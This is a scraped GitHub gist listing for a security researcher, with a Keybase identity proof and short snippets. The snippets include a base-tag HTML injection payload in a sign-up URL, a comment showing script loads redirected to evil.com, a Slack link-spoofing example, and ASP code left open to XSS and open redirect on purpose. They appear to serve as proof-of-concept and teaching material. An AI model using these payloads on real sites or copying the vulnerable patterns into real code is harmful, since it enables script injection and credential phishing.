I hereby claim:
- I am seanmarpo on github.
- I am seanmarpo (https://keybase.io/seanmarpo) on keybase.
- I have a public key ASA-7jaG1tucVe9k9bv8IheaF1W0r9OqbTZOQm9lV6T1KQo
To claim this, I am signing this object:
Sean Marpo seanmarpo
seanmarpo
/ base-tag-payload.html
Created
January 9, 2020 07:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://example.com/user/sign-up/next?email=<base href="https://poc.smarpo.com"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img src="/img/logo.png"> | |
| <script src="/js/main.js></script> | |
| <!-- | |
| With the addition of a <base> tag the src attributes above will look like: | |
| https://evil.com/img/logo.png | |
| https://evil.com/js/main.js | |
| --> | |
| <base href="https://evil.com"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Incoming Webhook Example | |
| // Slack ignores the "parse" value entirely in this case | |
| const { IncomingWebhook } = require('@slack/client'); | |
| const url = 'WEBHOOKURL'; | |
| const webhook = new IncomingWebhook(url); | |
| var text = '<https://google.com|Click Me Please!> https://google.com' | |
| const message = { |
seanmarpo
/ keybase.md
Created
October 5, 2017 06:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PS C:\Users\seanm\Desktop\test\Templates-master\Source\MVC5\Boilerplate.Web.Mvc5.Sample> devaudit.exe nuget . | |
| _____ _______ __ __ __ | |
| | \ .-----..--.--.| _ |.--.--..--| ||__|| |_ | |
| | -- || -__|| | || || | || _ || || _| | |
| |_____/ |_____| \___/ |___|___||_____||_____||__||____| | |
| v2.0.3.52 | |
| 21:46:21<01> [AUDIT] [STATUS] Scanning NuGet packages. | |
| Scanning NuGet packages... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $env:Path += ";<full-path-to-devaudit-folder-here>" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript"> | |
| if (val) { | |
| alert("The amount <%= Request.Form("itmAmount") %> is not valid"); | |
| } | |
| </script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form action="post.asp" method="post"> | |
| <input type="text" name="title" value=<%= Request.Form("title") %>> | |
| <textarea> <%= Request.Form("post") %> </textarea> | |
| </form> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form action="login.asp?<%= Request.Querystring("redirect") %>" method="post"> | |
| <input type="text" name="username"> | |
| <input type="password" name="password"> | |
| </form> |